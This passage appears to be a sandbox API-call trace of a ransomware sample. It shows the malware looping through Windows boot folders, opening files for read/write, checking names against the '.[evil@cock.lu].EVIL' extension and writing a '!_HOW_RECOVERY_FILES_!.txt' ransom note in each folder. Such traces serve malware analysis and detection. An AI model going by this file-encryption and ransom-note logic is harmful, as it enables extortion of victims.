0xffffffffffffffff [0077.864] GetLastError () returned 0x5 [0077.864] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0077.864] wcsstr (_Str="segoe_slboot.ttf", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.864] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\Fonts\\segoe_slboot.ttf") returned 31 [0077.864] wcscmp (_String1="segoe_slboot.ttf", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0077.864] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="segoe_slboot.ttf") returned 0x0 [0077.864] wcslen (_String="C:\\\\Boot\\Fonts\\segoe_slboot.ttf") returned 0x1f [0077.864] CreateFileW (lpFileName="C:\\\\Boot\\Fonts\\segoe_slboot.ttf" (normalized: "c:\\boot\\fonts\\segoe_slboot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0077.864] GetLastError () returned 0x5 [0077.864] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0077.864] wcsstr (_Str="wgl4_boot.ttf", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.864] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\Fonts\\wgl4_boot.ttf") returned 28 [0077.864] wcscmp (_String1="wgl4_boot.ttf", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0077.864] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="wgl4_boot.ttf") returned 0x0 [0077.864] wcslen (_String="C:\\\\Boot\\Fonts\\wgl4_boot.ttf") returned 0x1c [0077.865] CreateFileW (lpFileName="C:\\\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0077.876] GetLastError () returned 0x5 [0077.876] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0 [0077.876] FindClose (in: hFindFile=0x84b11cd150 | out: hFindFile=0x84b11cd150) returned 1 [0077.877] wcslen (_String="C:\\\\Boot\\Fonts") returned 0xe [0077.877] strlen (_Str="${KEY}") returned 0x6 [0077.877] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0077.877] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0077.877] strlen (_Str="${CODE}") returned 0x7 [0077.877] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0077.877] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0077.877] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0077.877] _wfsopen (_FileName="C:\\\\Boot\\Fonts\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0077.878] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0077.878] __uncaught_exception () returned 0x84b1160800 [0077.878] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0077.879] FindNextFileW (in: hFindFile=0x84b11cd0f0, lpFindFileData=0x84b0fdee80 | out: lpFindFileData=0x84b0fdee80) returned 1 [0077.879] wcsstr (_Str="fr-CA", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.879] _snwprintf (in: _Dest=0x84b0fdf0d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\fr-CA") returned 14 [0077.879] wcscmp (_String1=".", _String2="fr-CA") returned -1 [0077.879] wcscmp (_String1="..", _String2="fr-CA") returned -1 [0077.879] wcslen (_String="C:\\\\Boot\\fr-CA") returned 0xe [0077.879] wcscpy_s (in: _Destination=0x84b0fdebb0, _SizeInWords=0x104, _Source="C:\\\\Boot\\fr-CA" | out: _Destination="C:\\\\Boot\\fr-CA") returned 0x0 [0077.879] wcscat (in: _Dest=0x84b0fdebb0, _Source="\\*" | out: _Dest="C:\\\\Boot\\fr-CA\\*") returned="C:\\\\Boot\\fr-CA\\*" [0077.879] FindFirstFileW (in: lpFileName="C:\\\\Boot\\fr-CA\\*", lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0x84b11cd150 [0077.879] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.879] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\fr-CA\\.") returned 16 [0077.879] wcscmp (_String1=".", _String2=".") returned 0 [0077.879] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0077.879] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.879] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\fr-CA\\..") returned 17 [0077.879] wcscmp (_String1=".", _String2="..") returned -1 [0077.880] wcscmp (_String1="..", _String2="..") returned 0 [0077.880] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0077.880] wcsstr (_Str="bootmgr.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.880] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\fr-CA\\bootmgr.exe.mui") returned 30 [0077.880] wcscmp (_String1="bootmgr.exe.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0077.880] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="bootmgr.exe.mui") returned 0x0 [0077.880] wcslen (_String="C:\\\\Boot\\fr-CA\\bootmgr.exe.mui") returned 0x1e [0077.880] CreateFileW (lpFileName="C:\\\\Boot\\fr-CA\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-ca\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0077.887] GetLastError () returned 0x5 [0077.887] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0 [0077.887] FindClose (in: hFindFile=0x84b11cd150 | out: hFindFile=0x84b11cd150) returned 1 [0077.887] wcslen (_String="C:\\\\Boot\\fr-CA") returned 0xe [0077.887] strlen (_Str="${KEY}") returned 0x6 [0077.887] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0077.887] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0077.887] strlen (_Str="${CODE}") returned 0x7 [0077.887] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0077.887] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0077.887] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0077.887] _wfsopen (_FileName="C:\\\\Boot\\fr-CA\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0077.888] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0077.888] __uncaught_exception () returned 0x84b1160800 [0077.888] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0077.889] FindNextFileW (in: hFindFile=0x84b11cd0f0, lpFindFileData=0x84b0fdee80 | out: lpFindFileData=0x84b0fdee80) returned 1 [0077.889] wcsstr (_Str="fr-FR", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.889] _snwprintf (in: _Dest=0x84b0fdf0d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\fr-FR") returned 14 [0077.889] wcscmp (_String1=".", _String2="fr-FR") returned -1 [0077.889] wcscmp (_String1="..", _String2="fr-FR") returned -1 [0077.889] wcslen (_String="C:\\\\Boot\\fr-FR") returned 0xe [0077.889] wcscpy_s (in: _Destination=0x84b0fdebb0, _SizeInWords=0x104, _Source="C:\\\\Boot\\fr-FR" | out: _Destination="C:\\\\Boot\\fr-FR") returned 0x0 [0077.889] wcscat (in: _Dest=0x84b0fdebb0, _Source="\\*" | out: _Dest="C:\\\\Boot\\fr-FR\\*") returned="C:\\\\Boot\\fr-FR\\*" [0077.889] FindFirstFileW (in: lpFileName="C:\\\\Boot\\fr-FR\\*", lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0x84b11cd150 [0077.889] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.889] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\fr-FR\\.") returned 16 [0077.889] wcscmp (_String1=".", _String2=".") returned 0 [0077.889] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0077.889] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.889] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\fr-FR\\..") returned 17 [0077.889] wcscmp (_String1=".", _String2="..") returned -1 [0077.889] wcscmp (_String1="..", _String2="..") returned 0 [0077.889] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0077.889] wcsstr (_Str="bootmgr.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.889] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\fr-FR\\bootmgr.exe.mui") returned 30 [0077.890] wcscmp (_String1="bootmgr.exe.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0077.890] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="bootmgr.exe.mui") returned 0x0 [0077.890] wcslen (_String="C:\\\\Boot\\fr-FR\\bootmgr.exe.mui") returned 0x1e [0077.890] CreateFileW (lpFileName="C:\\\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0077.890] GetLastError () returned 0x5 [0077.890] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0077.890] wcsstr (_Str="memtest.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.890] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\fr-FR\\memtest.exe.mui") returned 30 [0077.890] wcscmp (_String1="memtest.exe.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0077.890] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="memtest.exe.mui") returned 0x0 [0077.890] wcslen (_String="C:\\\\Boot\\fr-FR\\memtest.exe.mui") returned 0x1e [0077.890] CreateFileW (lpFileName="C:\\\\Boot\\fr-FR\\memtest.exe.mui" (normalized: "c:\\boot\\fr-fr\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0077.890] GetLastError () returned 0x5 [0077.891] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0 [0077.891] FindClose (in: hFindFile=0x84b11cd150 | out: hFindFile=0x84b11cd150) returned 1 [0077.891] wcslen (_String="C:\\\\Boot\\fr-FR") returned 0xe [0077.891] strlen (_Str="${KEY}") returned 0x6 [0077.891] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0077.891] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0077.891] strlen (_Str="${CODE}") returned 0x7 [0077.891] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0077.891] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0077.891] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0077.891] _wfsopen (_FileName="C:\\\\Boot\\fr-FR\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0077.906] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0077.906] __uncaught_exception () returned 0x84b1160800 [0077.906] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0077.906] FindNextFileW (in: hFindFile=0x84b11cd0f0, lpFindFileData=0x84b0fdee80 | out: lpFindFileData=0x84b0fdee80) returned 1 [0077.906] wcsstr (_Str="hr-HR", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.906] _snwprintf (in: _Dest=0x84b0fdf0d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\hr-HR") returned 14 [0077.906] wcscmp (_String1=".", _String2="hr-HR") returned -1 [0077.906] wcscmp (_String1="..", _String2="hr-HR") returned -1 [0077.906] wcslen (_String="C:\\\\Boot\\hr-HR") returned 0xe [0077.906] wcscpy_s (in: _Destination=0x84b0fdebb0, _SizeInWords=0x104, _Source="C:\\\\Boot\\hr-HR" | out: _Destination="C:\\\\Boot\\hr-HR") returned 0x0 [0077.906] wcscat (in: _Dest=0x84b0fdebb0, _Source="\\*" | out: _Dest="C:\\\\Boot\\hr-HR\\*") returned="C:\\\\Boot\\hr-HR\\*" [0077.907] FindFirstFileW (in: lpFileName="C:\\\\Boot\\hr-HR\\*", lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0x84b11cd150 [0077.909] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.909] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\hr-HR\\.") returned 16 [0077.909] wcscmp (_String1=".", _String2=".") returned 0 [0077.909] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0077.909] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.909] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\hr-HR\\..") returned 17 [0077.909] wcscmp (_String1=".", _String2="..") returned -1 [0077.909] wcscmp (_String1="..", _String2="..") returned 0 [0077.909] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0077.909] wcsstr (_Str="bootmgr.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.909] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\hr-HR\\bootmgr.exe.mui") returned 30 [0077.909] wcscmp (_String1="bootmgr.exe.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0077.909] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="bootmgr.exe.mui") returned 0x0 [0077.909] wcslen (_String="C:\\\\Boot\\hr-HR\\bootmgr.exe.mui") returned 0x1e [0077.909] CreateFileW (lpFileName="C:\\\\Boot\\hr-HR\\bootmgr.exe.mui" (normalized: "c:\\boot\\hr-hr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0077.909] GetLastError () returned 0x5 [0077.909] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0 [0077.909] FindClose (in: hFindFile=0x84b11cd150 | out: hFindFile=0x84b11cd150) returned 1 [0077.909] wcslen (_String="C:\\\\Boot\\hr-HR") returned 0xe [0077.909] strlen (_Str="${KEY}") returned 0x6 [0077.909] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0077.909] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0077.909] strlen (_Str="${CODE}") returned 0x7 [0077.909] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0077.909] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0077.909] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0077.909] _wfsopen (_FileName="C:\\\\Boot\\hr-HR\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0077.910] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0077.910] __uncaught_exception () returned 0x84b1160800 [0077.910] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0077.910] FindNextFileW (in: hFindFile=0x84b11cd0f0, lpFindFileData=0x84b0fdee80 | out: lpFindFileData=0x84b0fdee80) returned 1 [0077.911] wcsstr (_Str="hu-HU", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.911] _snwprintf (in: _Dest=0x84b0fdf0d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\hu-HU") returned 14 [0077.911] wcscmp (_String1=".", _String2="hu-HU") returned -1 [0077.911] wcscmp (_String1="..", _String2="hu-HU") returned -1 [0077.911] wcslen (_String="C:\\\\Boot\\hu-HU") returned 0xe [0077.911] wcscpy_s (in: _Destination=0x84b0fdebb0, _SizeInWords=0x104, _Source="C:\\\\Boot\\hu-HU" | out: _Destination="C:\\\\Boot\\hu-HU") returned 0x0 [0077.911] wcscat (in: _Dest=0x84b0fdebb0, _Source="\\*" | out: _Dest="C:\\\\Boot\\hu-HU\\*") returned="C:\\\\Boot\\hu-HU\\*" [0077.911] FindFirstFileW (in: lpFileName="C:\\\\Boot\\hu-HU\\*", lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0x84b11cd150 [0077.911] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.911] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\hu-HU\\.") returned 16 [0077.911] wcscmp (_String1=".", _String2=".") returned 0 [0077.911] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0077.911] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.911] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\hu-HU\\..") returned 17 [0077.911] wcscmp (_String1=".", _String2="..") returned -1 [0077.911] wcscmp (_String1="..", _String2="..") returned 0 [0077.911] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0077.911] wcsstr (_Str="bootmgr.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.911] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\hu-HU\\bootmgr.exe.mui") returned 30 [0077.911] wcscmp (_String1="bootmgr.exe.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0077.911] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="bootmgr.exe.mui") returned 0x0 [0077.911] wcslen (_String="C:\\\\Boot\\hu-HU\\bootmgr.exe.mui") returned 0x1e [0077.911] CreateFileW (lpFileName="C:\\\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0077.911] GetLastError () returned 0x5 [0077.911] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0077.911] wcsstr (_Str="memtest.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.911] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\hu-HU\\memtest.exe.mui") returned 30 [0077.911] wcscmp (_String1="memtest.exe.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0077.911] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="memtest.exe.mui") returned 0x0 [0077.911] wcslen (_String="C:\\\\Boot\\hu-HU\\memtest.exe.mui") returned 0x1e [0077.911] CreateFileW (lpFileName="C:\\\\Boot\\hu-HU\\memtest.exe.mui" (normalized: "c:\\boot\\hu-hu\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0078.063] GetLastError () returned 0x5 [0078.063] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0 [0078.063] FindClose (in: hFindFile=0x84b11cd150 | out: hFindFile=0x84b11cd150) returned 1 [0078.063] wcslen (_String="C:\\\\Boot\\hu-HU") returned 0xe [0078.063] strlen (_Str="${KEY}") returned 0x6 [0078.063] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0078.063] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0078.063] strlen (_Str="${CODE}") returned 0x7 [0078.063] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0078.064] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0078.064] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0078.064] _wfsopen (_FileName="C:\\\\Boot\\hu-HU\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0078.102] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0078.102] __uncaught_exception () returned 0x84b1160800 [0078.102] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0078.102] FindNextFileW (in: hFindFile=0x84b11cd0f0, lpFindFileData=0x84b0fdee80 | out: lpFindFileData=0x84b0fdee80) returned 1 [0078.102] wcsstr (_Str="it-IT", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0078.102] _snwprintf (in: _Dest=0x84b0fdf0d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\it-IT") returned 14 [0078.102] wcscmp (_String1=".", _String2="it-IT") returned -1 [0078.102] wcscmp (_String1="..", _String2="it-IT") returned -1 [0078.103] wcslen (_String="C:\\\\Boot\\it-IT") returned 0xe [0078.103] wcscpy_s (in: _Destination=0x84b0fdebb0, _SizeInWords=0x104, _Source="C:\\\\Boot\\it-IT" | out: _Destination="C:\\\\Boot\\it-IT") returned 0x0 [0078.103] wcscat (in: _Dest=0x84b0fdebb0, _Source="\\*" | out: _Dest="C:\\\\Boot\\it-IT\\*") returned="C:\\\\Boot\\it-IT\\*" [0078.103] FindFirstFileW (in: lpFileName="C:\\\\Boot\\it-IT\\*", lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0x84b11cd150 [0078.103] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0078.103] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\it-IT\\.") returned 16 [0078.103] wcscmp (_String1=".", _String2=".") returned 0 [0078.103] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0078.103] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0078.103] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\it-IT\\..") returned 17 [0078.103] wcscmp (_String1=".", _String2="..") returned -1 [0078.103] wcscmp (_String1="..", _String2="..") returned 0 [0078.103] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0078.103] wcsstr (_Str="bootmgr.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0078.103] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\it-IT\\bootmgr.exe.mui") returned 30 [0078.103] wcscmp (_String1="bootmgr.exe.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0078.103] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="bootmgr.exe.mui") returned 0x0 [0078.103] wcslen (_String="C:\\\\Boot\\it-IT\\bootmgr.exe.mui") returned 0x1e [0078.103] CreateFileW (lpFileName="C:\\\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0078.103] GetLastError () returned 0x5 [0078.103] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0078.103] wcsstr (_Str="memtest.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0078.103] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\it-IT\\memtest.exe.mui") returned 30 [0078.103] wcscmp (_String1="memtest.exe.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0078.103] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="memtest.exe.mui") returned 0x0 [0078.103] wcslen (_String="C:\\\\Boot\\it-IT\\memtest.exe.mui") returned 0x1e [0078.103] CreateFileW (lpFileName="C:\\\\Boot\\it-IT\\memtest.exe.mui" (normalized: "c:\\boot\\it-it\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0078.104] GetLastError () returned 0x5 [0078.104] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0 [0078.104] FindClose (in: hFindFile=0x84b11cd150 | out: 